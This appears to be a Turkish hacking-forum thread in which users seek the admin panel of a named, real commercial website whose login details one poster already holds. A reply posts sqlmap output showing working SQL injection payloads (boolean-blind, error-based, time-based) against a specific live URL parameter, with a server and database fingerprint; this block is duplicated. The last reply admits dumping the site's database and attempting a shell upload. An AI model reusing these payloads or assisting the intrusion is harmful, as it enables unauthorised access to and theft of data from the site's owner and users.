Sa beyler elimde bi sitenin login bilgileri mevcut lakin ne yapıp ettimse admin panelini bulamadım bi yardım edermisiniz site
http://starvida.com.tr/
http://starvida.com.tr/
Admin Panel Yok Yardım ?
- Konbuyu başlatan Sinyal
- Başlangıç tarihi
Pc Format Atım Hiçbir Admin Panel Bulucu Program yok turkce birseyler dene yonetim.asp gibi bol sans
denedim kardeşim mavigen yapmış siteyi mavigen in diğer sitelerindeki kullandığı panel linklerinide denedim genede olmadı
Site ASP de kodlanmasına rağmen statik olarak tasarlanmış.
Bu nedenle paneli yok.
Manuel olarak kod değişikliği yapılıyor.
Sitede sql server ve mail server var.
Bunlarda açık aranabilir.
Sistemde Sql Injection buldum. Payload larını paylaşıyorum...
------
Link:
http://starvida.com.tr/urunler_kat.asp?katid=44
Parameter: katid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: katid=44 RLIKE (SELECT (CASE WHEN (9350=9350) THEN 44 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: katid=44 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707871,(SELECT (ELT(8490=8490,1))),0x71707a6a71,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: katid=44 AND SLEEP(5)
---
[12:22:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL >= 5.5
Bu nedenle paneli yok.
Manuel olarak kod değişikliği yapılıyor.
Sitede sql server ve mail server var.
Bunlarda açık aranabilir.
Sistemde Sql Injection buldum. Payload larını paylaşıyorum...
------
Link:
http://starvida.com.tr/urunler_kat.asp?katid=44
Parameter: katid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: katid=44 RLIKE (SELECT (CASE WHEN (9350=9350) THEN 44 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: katid=44 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707871,(SELECT (ELT(8490=8490,1))),0x71707a6a71,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: katid=44 AND SLEEP(5)
---
[12:22:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL >= 5.5
Trsz_kwT' Alıntı:
sitede açık olduğunu bende biliyorum o yüzden bilgileri bende db sini çektim sqlmap ile shell yüklemeyi denedim olmadı o yüzden panel arıyorum